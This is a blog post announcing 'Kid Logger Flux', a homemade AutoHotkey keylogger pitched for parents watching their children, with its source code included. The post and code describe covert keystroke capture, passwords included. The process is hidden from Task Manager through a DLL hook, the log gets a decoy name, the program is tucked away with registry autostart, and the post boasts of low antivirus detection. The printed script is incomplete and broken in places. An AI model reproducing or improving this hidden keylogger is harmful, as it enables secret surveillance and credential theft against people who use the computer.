Wednesday, September 28, 2016

Kid Logger Flux

Kid Logger Flux V1.0 - Key Logger

Yes, I said it. A key logger. You may have heard about these and similar tools, tools that can log everything you type (yes, your passwords too) and, of course, they get a bad reputation for the damage they can cause. But like any tool they can be used for both good and bad. It all depends on the person using the tool and what they intend to do with it. I, for example, need to watch what my kids are doing on my computers. I know we would all love to trust our children, but any logical, experienced parent knows that this is not always possible; even if you are the best parent. Kids are kids. Kids are curious. Kids do bad things without thinking about the consequences. I know all too well, I was a kid with no structure or rules and even if I had rules there's was no way anyone was going to make me do anything. I now all too well how bad kids can be.

There are a few good parental tools out there and I have nothing against them, but I like to make my own tools and I really don't need all the extra stuff they provide, I have other tools I have built to do those things and all I needed was to see what things my kids are typing and so today I bring you Kid Logger Flux V1.0!

Kid Logger Flux is a very small utility that logs all physically typed keys (key logger) and logs them to a text file located in the programs folder. This utility has no network capabilities and will never connect to anything, anywhere. KLF runs hidden from the task manager and can only be killed with the hotkeys: Control+Shift+Alt+F12 or by shutting down your computer. I have made it hidden because kids are becoming a lot smarter than they used to be and if they learn about the Task Manager they could learn how to kill the process and also see where the program is located so they could remove it. KLF should be put in a folder deep somewhere where your kids will not be likely to look. The log file is named config.log so it is vague and might not attract their attention.


  • Can be ran like any other executable, by double clicking, right-click: Run, or any normal method to start apps at boot. It is not a good idea to put this in the Startup folder in your documents as that might be the first place your kid looks to find it. It is a much better idea to put a startup entry in the registry if you want this to start at boot. More info on starting things at boot with the registry here Startup registry info @
  • To end this program while your computer is just use the Hoteys: Control+Shift+Alt+F12.
  • View all logged typed text in the config.log file created in the programs folder where you hid it.


VirusTotal only gives two detections (which is awesome) and, of course, they are false-positives.
Virus Total Results


Script - Source

FileInstall, C:\hyde.dll, hyde.dll, 1
#SingleInstance, Force

; Variables
SetWorkingDir, %A_ScriptDir%

hMod := DllCall("LoadLibrary", Str, "hyde.dll", Ptr)
If (hMod)
 hHook := DllCall("SetWindowsHookEx", Int, 5, Ptr, DllCall("GetProcAddress", Ptr, hMod, AStr, "CBProc", ptr), Ptr, hMod, Ptr, 0, Ptr)
 If (!hHook)
Loop { 
 Input, b, V T5
 FileAppend, %b%, %A_WorkingDir%\config.log

; Hotkeys

No comments: